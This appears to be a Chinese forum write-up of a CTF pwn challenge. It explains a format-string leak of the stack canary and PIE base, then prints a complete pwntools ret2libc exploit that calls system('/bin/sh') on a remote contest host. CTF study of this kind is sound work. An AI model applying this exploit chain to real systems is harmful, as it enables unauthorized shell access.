-
-
[分享]ctfpwn题考点retlibc,pie,canary
-
发表于: 2023-12-4 12:24 3274
-
今天来看一道pwn题
可以看到canary和pie都开了
则需要拿到canary值还要piebase的基址
这是程序入口进入bird看看
明显看到有字符串漏洞
则可以通过格式化字符串直接泄漏canary和main+1c的地址
main+1c为箭头处
则开始考虑获取后门
没有后门字符串,则需要自己构造通过libc
exp如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | 插入代码 import LibcSearcher from pwn import * context(log_level = "debug" , arch = "amd64" , os = "linux" ) sh = remote( '1.container.jingsai.apicon.cn' , 31185 ) # sh=process('/home/xinhu/1/ezpie') elf = ELF( '/home/xinhu/Desktop/11/vuln' ) # payload 1 sh.sendline(b '%11$p' + b ' %13$p' ) sh.recvuntil( "I'm a bird and I'll steal your pie.\n" ) data1 = sh.recv() canry = int (data1[ 0 : 18 ], 16 ) canry1 = p64(canry) main = int (data1[ 19 : 33 ], 16 ) - 0x1c print (data1) piebase = main - elf.symbols[ 'main' ] putsPlt = elf.plt[ 'puts' ] + piebase putsGot = elf.got[ 'puts' ] + piebase search = piebase + elf.symbols[ 'search' ] popRdiAddr = piebase + 0x1443 retAddr = piebase + 0x101a sh.sendline(b '1' * 72 + p64(canry) + b '1' * 8 + p64(popRdiAddr) + p64(putsGot) + p64(putsPlt) + p64(search)) # skip sh.recvuntil( 'Did u tell me where my binsh is ?\n' ) sh.sendline(b '1' ) # data=sh.recv() data = u64(sh.recv( 6 ) + b '\0\0' ) # print(hex(data)) putsGotAddr = data libc = LibcSearcher.LibcSearcher( 'puts' , putsGotAddr & 0xfff ) libcBase = putsGotAddr - libc.dump( 'puts' ) shstrAddr = libcBase + libc.dump( 'str_bin_sh' ) systemAddr = libcBase + libc.dump( 'system' ) # payload 2 sh.sendline(b '0' * 72 + p64(canry) + b '0' * 8 + p64(popRdiAddr) + p64(shstrAddr) + p64(retAddr) + p64(systemAddr)) sh.sendline(b '1' ) sh.interactive() |
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
- [原创]逆向魔改tea+简单异或+z3运算 3863
- [原创]魔改RC4+隐表base64魔改逆向 4722
- [分享]ret2syscall64位栈溢出漏洞CTF 3695
- [分享]ctfpwn题考点retlibc,pie,canary 3275
- [原创]逆向CTFrsa算法 2252
看原图
赞赏
雪币:
留言: